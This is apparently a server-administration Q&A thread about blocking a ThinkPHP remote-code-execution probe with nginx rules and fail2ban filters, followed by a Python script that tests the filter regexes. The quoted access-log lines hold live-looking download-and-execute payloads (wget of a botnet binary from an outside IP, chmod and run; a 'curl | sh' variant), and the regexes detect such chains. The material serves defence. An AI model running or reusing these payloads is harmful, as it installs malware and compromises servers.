
Recently I figured out that my Ubuntu (LEMP) server has become a target for remote code execution attacks. In the access.log files it looks like this:

183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"

I am using Fail2ban, Cloudflare and CSF. I want to know whether there are any other possibilities to block such attacks using fail2ban. If I managed to block such attacks, I would block those IPs in the Cloudflare WAF.

Victor Perov
Chathu

1 Answer


Well, I do believe that fail2ban is not the right way to solve the flood you described, though it does have a way to do it (see the article here).

I would like to say that attacks like this one should have a very large pool of IPs, and blocking IPs instead of blocking the behaviour pattern is not a complete solution.

For your specific case, you could continue with the approach of blocking User-Agent and location patterns.

For example:

location / {
    # Reject the bot by its User-Agent. "~*" makes the match case-insensitive,
    # which is needed here because the logged agent is "Tsunami/2.0" (capital T);
    # a plain "~" against "(tsunami)" would not match it.
    if ($http_user_agent ~* (tsunami) ) {
        return 403;
    }
    # Reject the ThinkPHP invokefunction payload by the function name it carries
    # in the query string, regardless of which IP or User-Agent sends it.
    if ($query_string ~ "call_user_func_array" ) {
        return 403;
    }
    ...
}

And I would also like to suggest making sure you do not have any worms or backdoors on board your server (netstat -lntp, for example, will show any open ports and the services which use them).

Victor Perov
  • I think it's more useful to block the attacker by his attacking pattern, because I can see several attack patterns. The common similarity is downloading a remote file using 'wget' and executing it. – Chathu Mar 26 '19 at 03:59
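The answer blocks the request in nginx and the comment asks for blocking by the attack pattern instead of by IP, but neither shows what a fail2ban filter for this traffic would actually match. The following is an added example, not code from the question, the answer or fail2ban's own filter set: it holds three fail2ban-style failregex rules (the ThinkPHP invokefunction probe from the question, a generic download-and-execute chain, and the bot's User-Agent), runs them over sample access.log lines, and renders them as a filter file. The first log line is the one quoted in the question; the other four lines, the IPs in them, the filter name nginx-rce.conf and the simplified expansion of fail2ban's <HOST> placeholder are assumptions made for the example.

```python
import re
from collections import Counter

# fail2ban-style failregex rules. <HOST> is fail2ban's placeholder for the
# client address. The leading "^<HOST> -.*" is deliberately loose so the rule
# still matches after fail2ban strips the timestamp (nginx's "[date]" becomes
# "[]" before failregex is applied). nginx writes a literal " inside the
# request as \x22, so [^"]* safely stays within one quoted field.
FAILREGEX = [
    # ThinkPHP 5.x invokefunction / call_user_func_array probe, as in the question
    r'^<HOST> -.*"(?:GET|POST) [^"]*invokefunction&function=call_user_func_array[^"]*"',
    # Download-and-execute chain in the request: wget/curl of a URL followed by ; | or &&
    r'^<HOST> -.*"(?:GET|POST) [^"]*(?:wget|curl)\s+https?://[^"]*(?:;|\||&&)[^"]*"',
    # The bot's own User-Agent, i.e. the last quoted field of the combined log format
    r'^<HOST> -.*" \d{3} \d+ "[^"]*" "Tsunami/',
]

# Simplified stand-in for fail2ban's <HOST> expansion (assumption: fail2ban's real
# expansion is a more elaborate IPv4/IPv6/hostname pattern).
HOST_RE = r"(?P<host>[\w\-.:]+)"

SAMPLE_LINES = [
    # The request quoted in the question (nginx escapes the control bytes as \x09 and \x07)
    r'''183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"''',
    # Constructed: same ThinkPHP probe with a different loader and an innocuous User-Agent
    r'''192.0.2.10 - - [06/Mar/2019:19:13:02 +0530] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='curl http://198.51.100.5/x.sh | sh' HTTP/1.1" 400 166 "-" "Mozilla/5.0"''',
    # Constructed: the same client later identifying itself through the bot User-Agent
    r'''192.0.2.10 - - [06/Mar/2019:19:15:19 +0530] "GET / HTTP/1.1" 200 612 "-" "Tsunami/2.0"''',
    # Constructed: a legitimate search containing the word "wget"; must not be flagged
    r'''198.51.100.7 - - [06/Mar/2019:19:14:40 +0530] "GET /blog/?s=wget+tutorial HTTP/1.1" 200 5120 "-" "Mozilla/5.0"''',
    # Constructed: curl as a User-Agent, not as a payload; must not be flagged
    r'''203.0.113.9 - - [06/Mar/2019:19:16:03 +0530] "POST /api/ping HTTP/1.1" 404 0 "-" "curl/7.64.0"''',
]


def compile_failregex(pattern: str) -> "re.Pattern":
    """Expand <HOST> (approximately as fail2ban does) and compile the rule."""
    return re.compile(pattern.replace("<HOST>", HOST_RE))


def scan_log(lines, patterns=FAILREGEX) -> Counter:
    """Count matching lines per client IP. A line is counted once even when
    several rules match it, which mirrors fail2ban's per-line counting."""
    compiled = [compile_failregex(p) for p in patterns]
    hits = Counter()
    for line in lines:
        for rx in compiled:
            m = rx.search(line)
            if m:
                hits[m.group("host")] += 1
                break
    return hits


def offenders(hits: Counter, maxretry: int = 1) -> list:
    """IPs that reached the jail's maxretry threshold, sorted for stable output."""
    return sorted(ip for ip, n in hits.items() if n >= maxretry)


def fail2ban_filter() -> str:
    """Render the rules as a fail2ban filter file (hypothetical name:
    /etc/fail2ban/filter.d/nginx-rce.conf). Continuation lines are indented,
    which is how fail2ban reads a multi-line failregex."""
    rules = "\n            ".join(FAILREGEX)
    return "[Definition]\nfailregex = " + rules + "\nignoreregex =\n"


if __name__ == "__main__":
    counts = scan_log(SAMPLE_LINES)
    print("hits per IP:", dict(counts))
    print("would be banned (maxretry=1):", offenders(counts))
    print(fail2ban_filter())
```

Two caveats before pointing a jail at this. First, nginx logs the request line as received, so a percent-encoded payload (wget%20http...) will not match these literal patterns; decode or loosen the rules if you see that variant. Second, behind Cloudflare the $remote_addr at the front of each log line is a Cloudflare edge IP unless ngx_http_realip_module is configured with real_ip_header CF-Connecting-IP, and banning that address would cut off Cloudflare itself rather than the attacker. fail2ban ships fail2ban-regex, which can be run against the real access log and this filter file to confirm what it would match before enabling a jail.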